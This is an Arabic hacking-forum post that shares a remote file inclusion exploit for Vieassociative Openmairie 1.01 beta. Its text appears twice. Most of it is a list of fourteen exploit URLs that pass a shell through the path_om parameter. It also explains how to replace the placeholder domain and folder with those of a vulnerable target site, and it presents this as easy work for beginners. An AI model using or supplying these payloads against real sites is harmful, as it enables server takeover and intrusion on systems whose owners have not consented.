ثغرة بتاريخ 2010-04-13 Vieassociative Openmairie 1.01 beta (RFI) Multiple File Include Vulnerability
صفحة 1 من اصل 1
ثغرة بتاريخ 2010-04-13 Vieassociative Openmairie 1.01 beta (RFI) Multiple File Include Vulnerability
MRAAAD الثلاثاء سبتمبر 28, 2010 2:34 pm
سلام عليكم
الثغرة صدرت في موقع سكورتي بتاريخ 13-04-2010 وان شاء الله من يومنا هدا الى كل الايام الجاية بادن الله راح احاول انزل اجدد الثغرات بمعدل ثغرة يوميا
اما بعد نرجع لموضوعنا الاساسي الثغرة RFI/LFI- Multiple File Include Vulnerability-
شرح الاسم
RFI=Remote File Include
وانا راح اعمل شرح مختصرلهته الثغرة السهلة حتى لمبتدئين
لرفع السكريبت المصاب
https://adullact.net/frs/download.ph...e_1.01beta.zip
على ما اضن ان في السكريبت ملف ريد مي يعني اقراني بعربي او ملف يبين كيفية تتبيت السكريبت
اما الروابط استغلال التغرة
http://alghacking.com/[path]/gen/obj/association.class.php??path_om=Shell
او
http://alghacking.com/path/gen/obj/collectivite.class.php?path_om=Shell
او
http://alghacking.com/path/gen/obj/planning.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/rubrique.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/assurance.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/cotisation.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/profil.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/utilisateur.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/bureau.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj
/droit.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/aquartier.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/categorie.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/fonction.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/ressource.class.php?path_om=Shell
نشرح بعض العبارات المتغيرة
[path] هو اسم مجلد الدي يحوي او يتواجد فيه السكريبت
مثال وجدنا موقع www.alghaking.com/hacki/..../hacki_om
هون في متالنا كلمة او عبارة pathهيhackiاي اسم المجلد الدي يحوي السكريبت
ونعوض
اسم موقع alghacking.com بموقع المصاب
اضن ان الثغرة سهلة
الثغرة صدرت في موقع سكورتي بتاريخ 13-04-2010 وان شاء الله من يومنا هدا الى كل الايام الجاية بادن الله راح احاول انزل اجدد الثغرات بمعدل ثغرة يوميا
اما بعد نرجع لموضوعنا الاساسي الثغرة RFI/LFI- Multiple File Include Vulnerability-
شرح الاسم
RFI=Remote File Include
وانا راح اعمل شرح مختصرلهته الثغرة السهلة حتى لمبتدئين
لرفع السكريبت المصاب
https://adullact.net/frs/download.ph...e_1.01beta.zip
على ما اضن ان في السكريبت ملف ريد مي يعني اقراني بعربي او ملف يبين كيفية تتبيت السكريبت
اما الروابط استغلال التغرة
http://alghacking.com/[path]/gen/obj/association.class.php??path_om=Shell
او
http://alghacking.com/path/gen/obj/collectivite.class.php?path_om=Shell
او
http://alghacking.com/path/gen/obj/planning.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/rubrique.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/assurance.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/cotisation.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/profil.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/utilisateur.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/bureau.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj
/droit.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/aquartier.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/categorie.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/fonction.class.php?path_om=Shell
او
http://alghacking.com/[path]/gen/obj/ressource.class.php?path_om=Shell
نشرح بعض العبارات المتغيرة
[path] هو اسم مجلد الدي يحوي او يتواجد فيه السكريبت
مثال وجدنا موقع www.alghaking.com/hacki/..../hacki_om
هون في متالنا كلمة او عبارة pathهيhackiاي اسم المجلد الدي يحوي السكريبت
ونعوض
اسم موقع alghacking.com بموقع المصاب
اضن ان الثغرة سهلة
MRAAAD- مدير
- عدد المساهمات : 165
نقاط : 5502
السٌّمعَة : 0
تاريخ التسجيل : 28/09/2010
العمر : 32
الموقع : www.syriaa-hac.yoo7.com -
مواضيع مماثلة» شرح .... كيف تكتشف ثغرة file include .... مقدمة تفيد المبتدئيين
» ادخل ادمن في الشات ثغرة x7 chat
» ثــغرة ســهلة و بســيطة ==> "ثغرة مراكز التحميل"
» أحدث موبلات 2010
» ادخل ادمن في الشات ثغرة x7 chat
» ثــغرة ســهلة و بســيطة ==> "ثغرة مراكز التحميل"
» أحدث موبلات 2010
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى